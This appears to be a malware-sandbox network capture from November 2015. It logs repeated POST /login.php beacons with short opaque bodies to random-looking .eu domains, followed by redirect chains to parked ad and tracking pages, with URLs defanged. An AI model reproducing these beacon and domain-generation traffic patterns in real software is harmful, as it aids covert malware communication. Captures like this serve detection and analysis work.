User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.rynyhipexon.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:41 GMT

Server: Apache

Set-Cookie: vsid=905vr1955561817007335; expires=Wed, 18-Nov-2020 09:09:41 GMT; path=/; domain=ww92.rynyhipexon.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XogFpIWeIpJr5PYCNL QDXuaD8wjub0G2TCf1f5AfmcIV/0YQtuvLTHzpln PfYWkIyXNLhB3uNWrDOfYM8xog==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=63

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XogFpIWeIpJr5PYCNL QDXuaD8wjub0G2TCf1f5AfmcIV/0YQtuvLTHzpln PfYWkIyXNLhB3uNWrDOfYM8xog==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.rynyhipexon.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.rynyhipexon.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.rynyhipexon.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.rynyhipexon.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lykemujebeq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.lykemujebeq.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.lykemujebeq.eu..Vary: Accept-Encoding..

GET /domain/jewuqyjywyv.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=71c55851e5901a95263b027885fa0411; domain=.jewuqyjywyv.eu

Location: hXXp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411

3e..Go hXXp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nojejecebuw.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:20 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/nojejecebuw.eu

Set-Cookie: btst=b36799928aa683da3e97e7666bae6fc8|194.242.96.218|1448010560|1448010560|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

GET /domain/tucyguqaciq.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=d1e2832667be3ac8af2587e3c0958424; domain=.tucyguqaciq.eu

Location: hXXp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424

3e..Go hXXp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424..0..

GET /f89965e1c0417ff83998ff3762e77e38 HTTP/1.1

Host: xsso.ciliqikytec.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=429cf1fb2eaac1d730774bf27097da95|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=f89965e1c0417ff83998ff3762e77e38; domain=.ciliqikytec.eu

19..Landed ciliqikytec.eu<br>..0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.xuqufyduras.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:48 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>xuqufyduras.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'xuqufyduras.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU2NC42MDM4OjM1MDBjNzg2MmVhZjA4MDhjZjQ0ZjkzOGE4MmI0YjY1ODAyZDUzYjQxMGQ3MTBhNjUxZGU0M2Y2NjdiNmY0NjE6NTY0ZWUzNDQ5MzZlZA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTM0NDhiMjY2fHx8MTQ0ODAxMDU2NC42MDk5fGZjYThkMGFmZTdhZTU3NWZkYmViYzZlNzRlNmJkNmQ4NTQxMmQ1MTV8fHx8fDF8fHwwfDU2NGVlMzQ0MTM1MzVmYjUzZThiNTA2M3x8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ciliqikytec.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/ciliqikytec.eu

Set-Cookie: btst=429cf1fb2eaac1d730774bf27097da95|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.kevedorozup.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:04 GMT

Server: Apache

Set-Cookie: vsid=918vr1955561445810499; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.kevedorozup.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pCSuho4Rz2cFO6ztB/gVCEwEzGaOY4/zxPU34OpnSoSTVObfw1vkuwKwAjb1u/rzaQ58oMADjyaRB1YttOPnbQ==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=104

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pCSuho4Rz2cFO6ztB/gVCEwEzGaOY4/zxPU34OpnSoSTVObfw1vkuwKwAjb1u/rzaQ58oMADjyaRB1YttOPnbQ==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.kevedorozup.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.kevedorozup.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.kevedorozup.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.kevedorozup.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: digusebyvad.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:22:15 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.digusebyvad.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:15 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.digusebyvad.eu..Vary: Accept-Encoding..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.dimutobihom.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:00 GMT

Server: Apache

Set-Cookie: vsid=918vr1955561406202917; expires=Wed, 18-Nov-2020 09:09:00 GMT; path=/; domain=ww92.dimutobihom.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Mic7DvRpvetI juA8PXbn52KQPN AbsmtkknMs383riOTAcQmT9M10mpQJ6vSG50WzlfUtULM2gARrNlntDjZA==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=116

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Mic7DvRpvetI juA8PXbn52KQPN AbsmtkknMs383riOTAcQmT9M10mpQJ6vSG50WzlfUtULM2gARrNlntDjZA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.dimutobihom.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.dimutobihom.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.dimutobihom.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.dimutobihom.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen

<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.nozulufynax.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:49 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>nozulufynax.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'nozulufynax.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU2NS42Njk3OjQxNzNkNDE0ZTc3YTdhZjMyZDBmY2Y1ODQxZjA4MjlhZjIyMjNkNTE2NzUyYjUzYmRhYTQ0MjJiNGM4MmM4ZWI6NTY0ZWUzNDVhMzg2MQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM0NTljY2U2fHx8MTQ0ODAxMDU2NS42NzQ2fGI2NDQ2N2RkZTVhMjJmNjdiZjYyYWMwZmNlYjM1OTU3ODdiOTBiMzV8fHx8fDF8fHwwfDU2NGVlMzQ1MTU1MzVmMDMyOThiNjNkYnx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/

<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.norumikemem.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:28 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>norumikemem.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'norumikemem.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0NC40NDU3Ojk4OTkwOGUwMWZmNTQxYTZlOTU2MjFhZDcwNTI2MzFlZjVhZDY3MmRkMWVhMjk5ODc1NjY5YzYxYzI2ZWVkY2Y6NTY0ZWUzMzA2Y2QyMQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzMDZiMjczfHx8MTQ0ODAxMDU0NC40NTI0fDNjMzU2MWFjNGM5NmZlYTAzNTljY2M3YjRiODJhNTk0NWU3ZjZmNDB8fHx8fDF8fHwwfDU2NGVlMzMwMTM1MzVmNzI0MjhiNGZhZXx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/

<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.lyvufixyvet.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:19:04 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>lyvufixyvet.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'lyvufixyvet.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU4MC41MzMxOmEzZmNhYWY4MGRlNmIyZGZjZjU4MjkwZWY2OWNiY2U2Y2IwYThmNTFkYzdiOTQxYzE2ZGI5NmY4YzY5Nzk4ZmI6NTY0ZWUzNTQ4MjI4Nw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM1NDgxMWQzfHx8MTQ0ODAxMDU4MC41Mzh8YTRlZWY3YmVhYjlkNjk3YmFmNWI0MzhlYzM2YTRiNWYxMDkxMDU4NHx8fHx8MXx8fDB8NTY0ZWUzNTQ4OGZiY2UxYWFmOGI0OWE0fHx8MHx8fHx8fDB8fHx8fHx8fHw=';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyvufixyvet.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:22:10 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.lyvufixyvet.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:10 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.lyvufixyvet.eu..Vary: Accept-Encoding..

GET /zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525 HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ze1.zeroredirect1.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Cache-Control: no-store, no-cache, pre-check=0, post-check=0

content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'

x-content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'

X-WebKit-CSP: default-src 'self'; script-src 'self' 'unsafe-inline'

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Date: Fri, 20 Nov 2015 09:08:59 GMT

Server: ZeroPark-Traffic

3ed..<!DOCTYPE html>.<html>..<head>...<META http-equiv="refresh" content="1;URL='hXXp://ze1.zeroredirect2.com/zcredirect?visitid=56383af2-8f66-11e5-9f3b-06d3db30a525&type=meta'">..</head>..<body>...<script type="text/javascript">....setTimeout(function () {.....var pageWidth = window.innerWidth ? window.innerWidth : (document.documentElement && document.documentElement.clientWidth ? document.documentElement.clientWidth : document.getElementsByTagName('body')[0].clientWidth);.....var pageHeight = window.innerHeight ? window.innerHeight : (document.documentElement && document.documentElement.clientHeight ? document.documentElement.clientHeight : document.getElementsByTagName('body')[0].clientHeight);.....var iframeDetected = window.self !== window.top;.....window.location="hXXp://ze1.zeroredirect2.com/zcredirect?visitid=56383af2-8f66-11e5-9f3b-06d3db30a525&type=js&browserWidth=" pageWidth "&browserHeight=" pageHeight "&iframeDetected=" iframeDetected;....}, 1);...</script>..</body>.</html>..0..HTTP/1.1 200 OK..Cache-Control: no-store, no-cache, pre-check=0, post-check=0..content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'..x-content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'..X-WebKit-CSP: default-src 'self'; script-src 'self' 'unsafe-inline'..Content-Type: text/html;charset=UTF-8..Transfer-Encoding: chunked..Date: Fri, 20 Nov 2015 09:08:59 GMT..Server: ZeroPark-Traffic..3ed..<!DOCTYPE htm

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nozulufynax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:52 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.nozulufynax.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:52 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.nozulufynax.eu..Vary: Accept-Encoding......

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nozulufynax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:55 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.nozulufynax.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:55 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.nozulufynax.eu..Vary: Accept-Encoding..

GET /90623dde15463e9fb45001ad5063db65 HTTP/1.1

Host: xsso.nopegymozow.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=c5be0b98ef08bd0e96394b12a6af6382|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

